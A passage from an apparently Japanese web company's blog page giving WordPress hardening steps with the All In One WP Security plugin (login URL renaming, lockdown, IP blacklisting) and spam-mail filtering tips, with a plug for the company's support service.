    → そのアクセス元IPアドレスをブラックリストとして登録して、指定IPからのアクセスを遮断する。*(アスタリスク)を使用して、一定の範囲のIPアドレスをブロックする事も可能。※以下に設定のフローを記載。
  4. スパムアクセスのユーザー名にadminが多い。
    → ユーザー名 admin を使用しない。もし、初期設定してしまった場合、難易度の高いパスワードを設定する。
  5. ログインIDを知られないためにも、ユーザーのニックネームを設定する。初期状態では、IDがそのままユーザー名として使用されるので注意が必要です。つまり、サイトにログインIDを公開している状態なのです。(ただしくは、この方法でもURLからログインIDは判明してしまいますので、管理権限の低いユーザーでの投稿に変更します)
  6. ログイン画面に、ユーザー名とハワード以外にも、簡単な計算(計算して正しい数字をいれないとログインできない)を設置することも有効のようです。ログインキャプチャと呼ばれています。
  7. パスワード再設定、つまり「パスワードをお忘れですか」のリンク先にも上記と同じ方法のキャプチャを設置すると有効のようです。つまり、メールアカウント自体がハッキングされている事を想定する必要もあります。

 

これらの設定が重要です。最も簡単なのは、All In One WP Securityというプラグインを活用する(弊社も活用しています)。

 

上記1.の場合、管理画面の左メニュー「WP Security」から「Brute Force」を選択、初期表示される「Rename Login Page」の「Enable Rename Login Page Feature」にチェックをいれて、その下の「Login Page URL」で、管理画面へのアクセスURLをカスタマイズする。

つまり、通常(多くのケース)、管理画面へのアクセスは、
https://dt-a.net/wp/wp-login.php
ですが、これを例として、以下のようにカスタマイズ(例として)
https://dt-a.net/example-login
することで多くの不正アクセスを排除する事ができる。

※一部のサーバでSSLを使用している場合、うまくいかないケースもあります。この場合は、FTPアクセスしてWP Securityのパーミッションを一端0000にしてからリトライです。

 

上記2.のLogin Lock Downは、左の管理メニュー「WP Security」の「User Login」の初期表示される「Login Lockdown」の「Enable Login Lockdown Feature」にチェックを入れて、その下に見える「3」「5」「60」の数字(初期状態の数字でも問題はない)は、5分間に3回ログインに失敗した場合、60分間、アクセス元のIPをプロテクトする、という意味です。

 

上記3.のブラックリスト登録は、まず不正アクセスしてくるIPアドレスを取得する事から始まる。もし、こういったIPアドレスのリストが必要な場合、ご相談いただければお渡しできますが、敵(スパムアクセス元)もIPアドレスは、いろいろと変更してくるので効果が薄いかも知れません。(例として一般のプロバイダを利用していれば、毎回アクセス毎にIPアドレスは変わるのです。これを活用されるとかなりIPアドレスのリストが必要になります)

その上で、左の管理メニュー「WP Security」の「Blacklist Manager」から「Enable IP or User Agent Blacklisting」にチェックをいれて、その下の「Enter IP Addresses」にIPアドレスのリストをいれます。もしくは、さらに下にある「Enter User Agents」にユーザーエージェント」いれる事で、不正アクセスもとのシステムをプロテクトする事も可能なようです(実際には試していません)。

 

上記以外にも、顧客向けに対策したのは、

  • コメント無効化。
  • Pingback機能の無効化。
  • DBのPrefixのカスタマイズ(初期状態ではwp_になっている)。
  • htmlソース内のwordpressバージョンを非表示にする。

といった対応をしました。

 

そもそも、不正アクセスされて、どんな問題がおきるのか?ですが、ここ数年、弊社顧客の例ですと、以下ような問題がありました。

 

  • ウィルスを拡散する土台にされた。つまり、そのwebページにアクセスすると、何らかのウィルス感染するようにしかけられた。(当時、弊社にノウハウがなく専門業者にお願いして対応しました。結構なコストが発生しました。)
  • 上記とDoDos攻撃などの土台にされる可能性もある。
  • 怪しい外部リンク、例えば、webカジノや怪しい薬剤販売のwebサイトへのリンクが設置された。(3,000カ所を超る外部リンクを設置されました。ほとんどの部分手作業で取り除く事になった。トホホホ。)

 

これらのトラブル経験から
サイトの管理運営を最適化したサービス
DtAサポート」を始めました。

 DtAサポート 

スパムメール対策

 

最近では、セキュリティソフトの能力向上とspamリストの共有が進んだため、かなり少なくなりましたが、まだ、一部でスパムメールでお困りの方がいらっしゃるようですので、こちらの方法をお試しください。(一部は弊社のDtAサポートサービスについて書いています)

 

( 2017年1月27日追記 )

昨今、スパムメールも進化したのか送信元のドメインが存在しないケースが多々ありました。これはメールの返信を求めているのではなく、メール文中に書かれたリンクへのアクセスを求めているのです。なので、フィルタリングする際には、本文中の特定ドメインへのリンクがあった場合、スパムと判定して特定のフォルダに移動という設定がよいかと思います。

 

メールアプリケーションで
送受信している方について、
方法は、大きく3つ。

1)PCにインストールしているセキュリティソフトのスパムメール振り分け機能を利用する。

・GDATA
http://sv20.wadax.ne.jp/~gdata-co-jp/support/faq/archives/2012/01/6_8.htm

・ESET
http://eset-support.canon-its.jp/faq/show/190?site_domain=private

・Kaspersky
http://www.kaspersky.co.jp/

上記セキュリティソフトでは、スパム(もしくはspam)といった文字を受信メールの件名に追記されるので、お使いのメールアプリケーションのフィルタリングなどの振り分けで、スパムフォルダに移動する。

windowsメールでのフィルタリング設定
http://m-wake.com/wake/windows.html
http://salt.iajapan.org/wpmu/anti_spam/universal/mailreader/windows-live/

 

2)サーバの設定で、スパムフィルタを使用する。

サーバの設定で、「迷惑メールフィルタ」というのがありますので設定します。

デメリットがあって、通常のメールがこのフィルタにかかってしまうケースが結構あります。その場合、ホワイトリストに登録することで解消されます。

スパムメールなのに、スパム判定されないメールは、ブラックリストに登録する必要があります。

ホワイトリストもブラックリストも、すべて手動で実行する必要があるので作業が発生してしまいます。

 

3)spam学習機能を使う。例としてWindows Live Mail
http://salt.iajapan.org/wpmu/anti_spam/universal/mailreader/windows-live/

すでにspamメールが届いているのであれば、その発信元のメールアドレスをフィルタ設定して、特定のフォルダに移動させる、もしくは、ゴミ箱に直行といった設定が可能です。

この場合、メールアドレスを登録しても、以下のようなケースですと何度も設定をしなければならなくなりますので、その場合は、@を含むドメイン部分をフィルタ設定するとよいと思います。

example111@spam-mail.com
example222@spam-mail.com

上記ケースですと、同じ送信元から違ったアドレスを使って送信していますので、仮にフィルタ設定で、

example111@spam-mail.com

このアドレスを設定しても、別のアドレス

example222@spam-mail.com

から送信された場合は、フィルタが効きませんので、再度設定する事になり手間になります。

この場合は、

@spam-mail.com

このドメインを含む@以降をフィルタ設定する事で、上記ドメインからのメールはすべてスパム判定されます。

 

ここで、問題になってくるのが、送信元のドメインが、一般的なドメイン、例えば、gmail.comやhotmail.comの場合、これは一つ一つ、フィルタ設定する事になります。

 

2017年1月追記)また、送信元のアドレスが存在しないケースも増えてきました。つまり上記の設定によりスパム判定されてしまうようになった為、ターゲットにメールを届けられなくなったようで、存在しないドメインからの送信メールが届くケースもでてきました。その場合、メール文中に、スパムリンク、例えば、6url.ruといったスパムのリンク先があるのですが、このリンク先をメール部中にあるメールをスパムと判断するようフィルタリングすることで対応可能です。

 

ブラウザメールを
お使いの場合

上記のspam学習機能に近いのですが、spamメールをフィルタリングして、spamフォルダに自動で移動させる方法がよいかと思います。つまり、届いたメールをspamであると指定すると次回から、そのアドレスや文中にスパムリンクを含むメールは、スパムフォルダに自動で振り分けられます。

こういったスパム判定の情報は、共有されていて、この共有度合いといいますか、多くの人がスパムと判断した、つまり、そのメールはスパムといういった判定が自動で行われるようになります。

 

( 余談ですが )

スパムメールは、沢山届いた時期がありましたが、最近は激減しています。つまり、それだけセキュリティソフトのスパム判定の能力が高くなったので、送信する側からすれば、ほぼ送信する意味がなくなってきたと考えられます。

以前、本当にスパムメールが多かった時期は、送信されたアドレスやドメインのフィルタ設定に、自動返信として、そのアドレスが存在しないというサーバが自動で返信するような内容のメールを設定していました。

こうすれば、送信側も、このアドレスは存在しないと判断するので、送信リストからは外されるでしょう。